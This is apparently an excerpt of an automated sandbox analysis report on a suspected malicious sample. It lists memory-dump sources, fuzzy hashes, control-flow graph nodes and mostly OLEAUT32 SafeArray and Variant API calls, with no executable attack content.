                                                                                          • Opcode Fuzzy Hash: 62787e0f3ee8cb75f998f831766c7d09c3d9b8d37c63c7c2c83f074c9bec20fd
                                                                                          • Instruction Fuzzy Hash: F331F375D41208AFDB04CFA8D480AEEBBF6FF49310F10906AE911B7260DB71AA05CB95
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 8cq
                                                                                          • API String ID: 0-304758316
                                                                                          • Opcode ID: bff947af6581e42ba20dc32ae740e7164cbd7e8e9a284fd895baa1a7aa5deaff
                                                                                          • Instruction ID: 8d5ff71981f922699b787c00940de94978dccb496fafe8064d6ec61e5cab7619
                                                                                          • Opcode Fuzzy Hash: bff947af6581e42ba20dc32ae740e7164cbd7e8e9a284fd895baa1a7aa5deaff
                                                                                          • Instruction Fuzzy Hash: 0931E475D41208AFDB04CFA8D480AEEFBF6FF49310F10946AE911B7260DB719A45CB95
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1768998212.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5cc0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 90c8290e4f7e9cc0c6184e21b5d5fdaa3ce20c73ba1084403e172219ace2083c
                                                                                          • Instruction ID: 1f6529d368cb67f0fed480bd4516ca563bfa090bce00031d186dff0009c31458
                                                                                          • Opcode Fuzzy Hash: 90c8290e4f7e9cc0c6184e21b5d5fdaa3ce20c73ba1084403e172219ace2083c
                                                                                          • Instruction Fuzzy Hash: E1328174E012299FDB64DFA9C894BEDBBB2BF89300F1081AAD549A7354DB305E81CF51
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1763634407.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2eb0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: eae63e89815523a81b01d8d1afcbd4a8290e89f313cfbd0074c780114a5f2abe
                                                                                          • Instruction ID: d072b380ff02a54f71f53ba464eb314fe2e35e43b175d7658aa55a2a27bd173c
                                                                                          • Opcode Fuzzy Hash: eae63e89815523a81b01d8d1afcbd4a8290e89f313cfbd0074c780114a5f2abe
                                                                                          • Instruction Fuzzy Hash: BA129D74E002288FDB64DF69C984B9EBBB6BF89304F1081AAD509A7355DB305E85CF50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1768998212.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5cc0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b859713c512d832fe0dabe20972e84325d7d4af57b147f8fb0fa615513cc6401
                                                                                          • Instruction ID: 3bb7abf346a0a5c047852d93f57c060c02c5d8b5182f21966c009a0a100aa047
                                                                                          • Opcode Fuzzy Hash: b859713c512d832fe0dabe20972e84325d7d4af57b147f8fb0fa615513cc6401
                                                                                          • Instruction Fuzzy Hash: 4C91A374E012289FDB64DF6AC884BDDBBB2BF89300F1481AAD54DAB354DB305A81CF51
                                                                                          APIs
                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D0284BF
                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D0284D2
                                                                                          • SafeArrayGetElement.OLEAUT32 ref: 6D02850A
                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D0294C1
                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D0294D4
                                                                                          • SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6D02950C
                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D0297A4
                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D0297B7
                                                                                          • SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6D0297F2
                                                                                            • Part of subcall function 6D023A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D023B71
                                                                                            • Part of subcall function 6D023A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D023B83
                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D029D5F
                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D029D72
                                                                                          • SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6D029DAF
                                                                                            • Part of subcall function 6D023A90: SafeArrayDestroy.OLEAUT32(?), ref: 6D023BCF
                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D02A1BC
                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D02A1CF
                                                                                          • SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6D02A20C
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Bound$Destroy$Element
                                                                                          • String ID: A
                                                                                          • API String ID: 959723449-3554254475

                                                                                          APIs
                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D0229F6
                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D022A08
                                                                                          • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D022A2F
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D022ABB
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D022B3F
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D022C04
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D022C0B
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D022C12
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D022C96
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D022C9D
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D022CD6
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D022CDD
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D022CE4
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D022D1B
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D022D45
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D022D4C
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D022D53
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: Variant$Clear$ArraySafe$BoundInit$DestroyElement
                                                                                          • String ID:
                                                                                          • API String ID: 214056513-0

                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D01AF75
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D01AF7C
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D01AF83
                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 6D01B00D
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D01B027
                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D01B19C
                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D01B1AA
                                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 6D01B1C5
                                                                                          • _memmove.LIBCMT ref: 6D01B1E6
                                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 6D01B1EF
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D01B237
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D01B23E
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D01B245
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D01B29D
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D01B2A4
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D01B2AB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: Variant$Clear$ArraySafe$Init$BoundData$AccessCopyUnaccess_memmove
                                                                                          • String ID:
                                                                                          • API String ID: 3403836469-0

                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32 ref: 6D02D4B3
                                                                                          • VariantInit.OLEAUT32 ref: 6D02D4C5
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02D4CC
                                                                                          • _malloc.LIBCMT ref: 6D02D551
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6D02D58B
                                                                                          • SafeArrayCreateVector.OLEAUT32 ref: 6D02D5A6
                                                                                          • SafeArrayAccessData.OLEAUT32 ref: 6D02D5B8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: ArrayInitSafeVariant$CreateVector$AccessData_malloc
                                                                                          • String ID:
                                                                                          • API String ID: 1552365394-0

                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32 ref: 6D02D4B3
                                                                                          • VariantInit.OLEAUT32 ref: 6D02D4C5
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02D4CC
                                                                                          • _malloc.LIBCMT ref: 6D02D551
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6D02D58B
                                                                                          • SafeArrayCreateVector.OLEAUT32 ref: 6D02D5A6
                                                                                          • SafeArrayAccessData.OLEAUT32 ref: 6D02D5B8
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D02D601
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D02D63E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$InitVariant$CreateElementVector$AccessData_malloc
                                                                                          • String ID:
                                                                                          • API String ID: 2723946344-0

                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D0244FF
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D024505
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6D024516
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6D024551
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02455A
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6D024579
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6D024594
                                                                                          • SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 6D0245B5
                                                                                          • SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 6D0245CE
                                                                                          • std::tr1::_Xweak.LIBCPMT ref: 6D02475A
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D024777
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D024787
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02478D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$DestroyXweakstd::tr1::_
                                                                                          • String ID:
                                                                                          • API String ID: 1304965753-0

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$Init$Clear$Copy
                                                                                          • String ID:
                                                                                          • API String ID: 3833040332-0

                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32 ref: 6D02650C
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D026519
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D026520
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C), ref: 6D026531
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D02656D
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D026576
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D0265B6
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D0265BF
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D026666
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D026677
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02667E
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D026685
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$Clear$ArraySafe$Init$Element$CreateDestroyVector
                                                                                          • String ID:
                                                                                          • API String ID: 1625659656-0

                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02CBCA
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02CBD3
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6D02CBE4
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6D02CBF6
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D02CC0D
                                                                                          • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6D02CC39
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02CC42
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6D02CC5D
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6D02CC77
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D02CCEC
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02CCFC
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02CD02
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$Destroy
                                                                                          • String ID:
                                                                                          • API String ID: 3548156019-0

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$Clear$Init$Copy
                                                                                          • String ID:
                                                                                          • API String ID: 3214764494-0
                                                                                          • Opcode ID: c8aa8ca603ddbcbebd21f49550ad8778620104364df3595971650dbe79e3f6d3
                                                                                          • Instruction ID: 34948b5fc2f1001c4c8e0e11822f02116697f270096b14868fe15c830f67351b
                                                                                          • Opcode Fuzzy Hash: c8aa8ca603ddbcbebd21f49550ad8778620104364df3595971650dbe79e3f6d3
                                                                                          • Instruction Fuzzy Hash: 4C7137726083419FE700DFA9C880F5AB7E8BF89714F10895DFA55CB291D731E905CB62

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1495 6d0249b0-6d024a26 VariantInit * 3 SafeArrayCreateVector 1496 6d024a30-6d024a4d SafeArrayPutElement VariantClear 1495->1496 1497 6d024a28-6d024a2b 1495->1497 1498 6d024a53-6d024a5e 1496->1498 1499 6d024b5e 1496->1499 1497->1496 1501 6d024a60-6d024a65 call 6d07c1e0 1498->1501 1502 6d024a6a-6d024a7c 1498->1502 1500 6d024b61-6d024b63 1499->1500 1503 6d024b65-6d024b66 SafeArrayDestroy 1500->1503 1504 6d024b6c-6d024b97 VariantClear * 3 1500->1504 1501->1502 1502->1499 1507 6d024a82-6d024a8e 1502->1507 1503->1504 1507->1499 1508 6d024a94-6d024ae1 1507->1508 1512 6d024ae3-6d024ae8 call 6d07c1e0 1508->1512 1513 6d024aed-6d024b1c 1508->1513 1512->1513 1513->1499 1516 6d024b1e-6d024b29 1513->1516 1516->1499 1517 6d024b2b-6d024b3b call 6d01db30 1516->1517 1517->1499 1520 6d024b3d-6d024b4d call 6d0256b0 call 6d026880 1517->1520 1524 6d024b52-6d024b5c 1520->1524 1524->1500
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(6D0805A8), ref: 6D0249EE
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D0249F7
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D0249FD
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D024A08
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D024A39
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D024A45
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D024B66
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D024B76
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D024B7C
                                                                                          • VariantClear.OLEAUT32(6D0805A8), ref: 6D024B82
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                                                                          • String ID:
                                                                                          • API String ID: 2515392200-0
                                                                                          • Opcode ID: 5c0c7b5c223ba7d459c733f8f9a242239aa708217516cb45c2241984639825de
                                                                                          • Instruction ID: 159641b49a7b3ca175e4628023666abf017fa221d838c7aa8fe091f15f39f3eb
                                                                                          • Opcode Fuzzy Hash: 5c0c7b5c223ba7d459c733f8f9a242239aa708217516cb45c2241984639825de
                                                                                          • Instruction Fuzzy Hash: 2C515C76A0421AAFDB05DFA4CC84FAEB7BDFF99310F044169E915AB244D735E901CBA0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1525 6d0247d0-6d024848 VariantInit * 3 SafeArrayCreateVector 1526 6d024852-6d024871 SafeArrayPutElement VariantClear 1525->1526 1527 6d02484a-6d02484d 1525->1527 1528 6d024877-6d024882 1526->1528 1529 6d02496f-6d024971 1526->1529 1527->1526 1532 6d024884-6d024889 call 6d07c1e0 1528->1532 1533 6d02488e-6d0248a0 1528->1533 1530 6d024973-6d024974 SafeArrayDestroy 1529->1530 1531 6d02497a-6d0249a6 VariantClear * 3 1529->1531 1530->1531 1532->1533 1533->1529 1536 6d0248a6-6d0248b2 1533->1536 1536->1529 1537 6d0248b8-6d0248f1 1536->1537 1540 6d0248f3-6d0248f8 call 6d07c1e0 1537->1540 1541 6d0248fd-6d02492b 1537->1541 1540->1541 1544 6d02496c 1541->1544 1545 6d02492d-6d024938 1541->1545 1544->1529 1545->1544 1546 6d02493a-6d02494a call 6d01db30 1545->1546 1546->1544 1549 6d02494c-6d02495c call 6d0256b0 call 6d026880 1546->1549 1553 6d024961-6d024968 1549->1553 1553->1544
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02480C
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D024815
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02481B
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D024826
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,000000FF,?), ref: 6D02485B
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D024868
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D024974
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D024984
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02498A
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D024990
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                                                                          • String ID:
                                                                                          • API String ID: 2515392200-0
                                                                                          • Opcode ID: 1713b1d2f43c9a980aa585ff0c06fc36134b87939b1b7c2e6bbb576a605fa031
                                                                                          • Instruction ID: 18c92196bd157cfb2cf65f003a7875deae67f662fb1921a57b86f5b0da248794
                                                                                          • Opcode Fuzzy Hash: 1713b1d2f43c9a980aa585ff0c06fc36134b87939b1b7c2e6bbb576a605fa031
                                                                                          • Instruction Fuzzy Hash: 1C517B72904209AFDB04DFA8CC80EAEB7B9FF99310F15456DE606EB640D730E905CBA0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1554 6d0266a0-6d026725 VariantInit * 2 SafeArrayCreateVector 1555 6d026727-6d02672a 1554->1555 1556 6d02672f-6d02674f SafeArrayPutElement VariantClear 1554->1556 1555->1556 1557 6d026844-6d026846 1556->1557 1558 6d026755-6d026772 1556->1558 1561 6d026848-6d026849 SafeArrayDestroy 1557->1561 1562 6d02684f-6d026878 VariantClear * 2 1557->1562 1559 6d026774-6d026779 1558->1559 1560 6d02677c-6d02679c SafeArrayPutElement VariantClear 1558->1560 1559->1560 1560->1557 1563 6d0267a2-6d0267b0 1560->1563 1561->1562 1564 6d0267b2-6d0267b7 call 6d07c1e0 1563->1564 1565 6d0267bc-6d0267ef 1563->1565 1564->1565 1577 6d0267f2 call 137d149 1565->1577 1578 6d0267f2 call 137d148 1565->1578 1567 6d0267f4-6d0267f6 1567->1557 1568 6d0267f8-6d026805 1567->1568 1568->1557 1569 6d026807-6d02681c call 6d01db30 1568->1569 1569->1557 1572 6d02681e-6d02683f call 6d0256b0 call 6d026880 1569->1572 1572->1557 1577->1567 1578->1567
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32 ref: 6D0266DB
                                                                                          • VariantInit.OLEAUT32 ref: 6D0266EA
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6D026700
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D02673A
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D026747
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D026787
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D026794
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D026849
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02685A
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D026861
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ArrayClearSafe$ElementInit$CreateDestroyVector
                                                                                          • String ID:
                                                                                          • API String ID: 551789342-0
                                                                                          • Opcode ID: b274a2f7b151074189b0ca44e60457848f8c456effb89fe40e940069aee3b25f
                                                                                          • Instruction ID: 7b3be7f82fe018d3fcfb0c8cf69f9835443da5d176031b9304d55e2e4045ee50
                                                                                          • Opcode Fuzzy Hash: b274a2f7b151074189b0ca44e60457848f8c456effb89fe40e940069aee3b25f
                                                                                          • Instruction Fuzzy Hash: A2515976109206AFDB00CF64C844B5BBBF9EFC9714F01865DF9559B250DB30E905CBA2
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D0241AF
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D0241B5
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D0241C0
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6D0241F5
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D024201
                                                                                          • std::tr1::_Xweak.LIBCPMT ref: 6D024450
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02446D
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02447D
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D024483
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
